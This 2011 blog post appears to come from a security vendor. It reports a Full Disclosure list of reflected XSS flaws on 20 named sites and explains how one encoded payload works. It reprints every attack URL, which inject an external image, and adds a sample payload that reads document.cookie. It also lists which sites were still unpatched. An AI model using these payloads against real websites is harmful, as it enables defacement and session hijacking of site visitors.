Full Disclosure – 20 high profile sites vulnerable to XSS attacks

On Thursday morning a post appeared on the popular Full Disclosure Internet discussion group listing XSS vulnerabilities in no less than 20 high profile websites. Amongst the vulnerable are McDonalds, IEEE Explore, Harvard University, and energy.gov. The vulnerabilities were discovered by a hacker who goes by the handle *Invectus*.

Is an XSS Vulnerability a big deal?

XSS vulnerabilities (Cross-Site Scripting vulnerabilities) are often overshadowed by their big cousin, the infamous SQL Injection. This does not make them any less effective or deadly. XSS and SQL Injection attacks are similar in the way they inject malicious code. The difference is that an SQL attack, injects code into the target database whereas an XSS attack injects code into the target browser. In an XSS attack the hacker uses your website to inject code into your visitor’s browser.

Once a user is infected, the malicious code can do a variety of things. It can change the color scheme of the page the user is viewing. It can do more nasty things such as replacing images with pornographic content. Using the same techniques, links on the page may be re-written to point to malicious locations. Sometimes clicks can also be forced, simulating user action without his knowledge. Another popoular XSS attack reads out the user’s cookie and transmits it to the hacker. This allows him to impersonate the user and hijack his session. If the user happens to be the system administrator, the hacker can take over the entire website.

How to: XSS McDonalds

Below is the entire list of websites that were disclosed as vulnerable. At first glance the list is long and cryptic, but with some basic hacker techniques we can soon make some sense out of them.

//video.state.gov/en/search/img-srchttp-i55tin
ypiccom-witu7dpng-height650-width1000/Ij48aW1nIHNyY
z0iaHR0cDovL2k1NS50aW55cGljLmNvbS93aXR1N2QucG5nIiBo
ZWlnaHQ9IjY1MCIgd2lkdGg9IjEwMDAiPg%3D%3D

//www.telegraph.co.uk/search/?queryText=%22%3E

%3Cimg%20src=%22//i55.tinypic.com/witu7d.png%2
2%20height=%22650%22%20width=%221000%22%3E

//www.dsm.com/en_US/cworld/public/home/pages/s

earchResults.jsp?search-site=%22%3E%3Cimg+src%3D%22
http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height
%3D%22650%22+width%3D%221000%22%3E&noMimimumKeyword
s=false

//www.schools.nsw.edu.au/psearch/ext/?refine=n

ew&QueryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55
.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+wid
th%3D%221000%22%3E&Go.x=29&Go.y=25&Go=submit

//thetablet.co.uk/search.php?q=%22%3E%3Cimg%20

src=%22//i55.tinypic.com/witu7d.png%22%20heigh
t=%22650%22%20width=%221000%22%3E

//www.scstatehouse.gov/cgi-bin/query.exe?firs

t=FIRST&querytext=&category=%22%3E%3Cimg%20src=%22

//i55.tinypic.com/witu7d.png%22%20height=%226

50%22%20width=%221000%22%3E

//www.highered.tafensw.edu.au/vsearch/tafehig

heredu/?QueryText=%22%3E%3Cimg%20src=%22//i55
.tinypic.com/witu7d.png%22%20height=%22650%22%20wi
dth=%221000%22%3E

//www.mcdonalds.com/content/us/en/search/sear

ch_results.html?queryText=%22%3E%3Cimg%20src=%22ht
tp://i55.tinypic.com/witu7d.png%22%20height=%22650
%22%20width=%221000%22%3E

//www.watersportholland.nl/cgi-bin/watersport

holland/zoeken.cgi?search=Vera&query=%22%3E%3Cimg+
src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png
%22+height%3D%22650%22+width%3D%221000%22%3E

//www.gpo.gov/fdsys/search/searchresults.acti

on?st=%22%3E%3Cimg%20src=%22//i55.tinypic.com
/witu7d.png%22%20height=%22650%22%20width=%221000%
22%3E

//www.networkcomputing.com/sitesearch?sort=pu

blishDate+desc&queryText=%22%3E%3Cimg+src%3D%22htt
p%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3
D%22650%22+width%3D%221000%22%3E

//www.unc.edu/search/index.htm?q=%22%3E%3Cimg

+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.pn
g%22+height%3D%22650%22+width%3D%221000%22%3E&cx=0
14532668884084418890%3Ajyc_iub1byy&cof=FORID%3A10&
ie=UTF-8&hq=inurl%3Adevnet.unc.edu

//cugir.mannlib.cornell.edu/search?querytext=

%22%3E%3Cimg%20src=%22//i55.tinypic.com/witu7
d.png%22%20height=%22650%22%20width=%221000%22%3E

//ieeexplore.ieee.org./search/freesearchresul

t.jsp?newsearch=true&queryText=.QT.%3E%3Cimg+src.E
Q..QT.http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png.QT
.+height.EQ..QT.650.QT.+width.EQ..QT.1000.QT.%3E&x
=58&y=13

//vivo-vis.cns.iu.edu/vivo1/search?querytext=

%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com
%2Fwitu7d.png%22+height%3D%22650%22+width%3D%22100
0%22%3E

//google.nyu.edu/search?site=NYUWeb_Main&clie

nt=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&pro
xystylesheet=stern_frontend&sitesearch=www.stern.n
yu.edu&q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.ti
nypic.com%2Fwitu7d.png%22+height%3D%22650%22+width
%3D%221000%22%3E&x=8&y=6

//ofa.fas.harvard.edu/cal/search.php?q=%22%3E

%3Cimg%20src=%22//i55.tinypic.com/witu7d.png%
22%20height=%22650%22%20width=%221000%22%3E

//www.uidaho.edu/search?q=%22%3E%3Cscript%3EI

nvectus%3C/script%3E&cof=FORID:9&cref=//www.u
idaho.edu/search?xml=1&ticks=634508915004972966

//vivo.ufl.edu/search?flag1=1&querytext=%22%

3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fw
itu7d.png%22+height%3D%22650%22+width%3D%221000%22
%3E

//energy.gov/search/site/%22%3E%3Cimg%20src%3

D%22http%3A//i55.tinypic.com/witu7d.png%22%20heigh
t%3D%22650%22%20width%3D%221000%22%3E

 

Understanding XSS

I will take the www.mcdonalds.com vulnerability to help explain XSS in more detail.

The raw XSS attack is repeated below:

//www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22//i55.tiny

pic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

The first thing we will do is seperate the URL from the query. We split at the first question mark (?) and get two parts:

1. URL Part:

//www.mcdonalds.com/content/us/en/search/search_results.html

2. Query Part

queryText=%22%3E%3Cimg%20src=%22//i55.tinypic.com/witu7d.png%22%20

height=%22650%22%20width=%221000%22%3E

The URL part identifies the vulnerable file on the server. In this case the vulnerabilitie lies within the search functionality of the site, a very common attack vector for both SQL Injections and XSS attacks.

The Query Part is the actual attack code. You will notice lots of % symbols. These are called URL Encoders and are difficult to read without the right tools. I use the Acunetix HTTP Editor tool that is bundled with Acunetix WVS to decode URL Endoded Query Parts.

The human-readable Query Part now looks like this:

queryText="><img src="//i55.tinypic.com/witu7d.png" height="650" width="1000">

This script is hardly malicious. It injects the image of a flag into the McDonalds web page. I tested it out assuming that McDonalds would have fixed this security flaw immediately, and I was surprised to find that the vulnerabilitiy is still there.

This attack is pretty innoctuous as it is, however a crafty hacker will most likely manage to inject other malicious, such as the code below, which displays the user’s cookie:

<IMG SRC=javascript:alert('You cookie is this:' + document.cookie)>

I decided to check other websites to see if they patched their sites after the disclosure was announced. You find my results in the next sections.

Winners and Losers

I categorised the orignial list into the Winners - those who fixed the vulnerabilitiy within 24 hours of it’s diclosure, and the Losers - those who left the secuirty flaw there for everyone to exploit. Within the next few days hackers will be having a field day with the Losers especially those like IEEE Explore who serve paid content from their site.

Winners - Vulnerability is fixed:

  • Harvard University
  • US Department of State
  • Energy.gov
  • The Telegraph UK
  • University of North Carolina
  • Cornell University
  • University of Idaho

Losers - Website is still vulnerable:

  • McDonalds
  • US Government Printing Office
  • TAFE Higher Education
  • Watersportholland.nl
  • IEEE Explore
  • DSM
  • South California Legislature
  • Networkcomputing.com
  • VIVO
  • NYU Stern
  • The Tablet UK
  • NSW Public Schools

How to be a Winner

It is very probable that the hacker used automated tools to scan these web sites and automatically discover vulnerabilities. The injection code for each page is slightly different so the hacker must have tweaked around with each site to make his injection successful.

If you want to stay one step ahead you will need to use similar tools that the hacker uses. The most common one is a Web Vulnerability Scanner that supports automatic XSS detection. You will need to scan your website periodically to ensure that updates to the site do not expose new flaws.

Final Thoughts

In this case our hacker single handedly defaced 20 big web sites using XSS. The companies were lucky because the hacker did not have any malicious intent other than exposing them. The danger is what will come next; now that this list is in the wild the black-hats of the hacker community will pounce at every exposed vulnerability that is not patched.

If your website is on the list above you’d better do something about it now. If you want to make sure that your site never appears on such a list make regular scans and code reviews to fix any XSS vulnerabilities you may find.

Leave a Reply


*

  1. really nice finds and its kinda interesting and shocking to see McD not even interested in fixing it.

    September 13, 2011 at 5:59 pm Reply
  2. Pingback: Full Disclosure – 20 high profile sites vulnerable to XSS attacks | National Cyber Security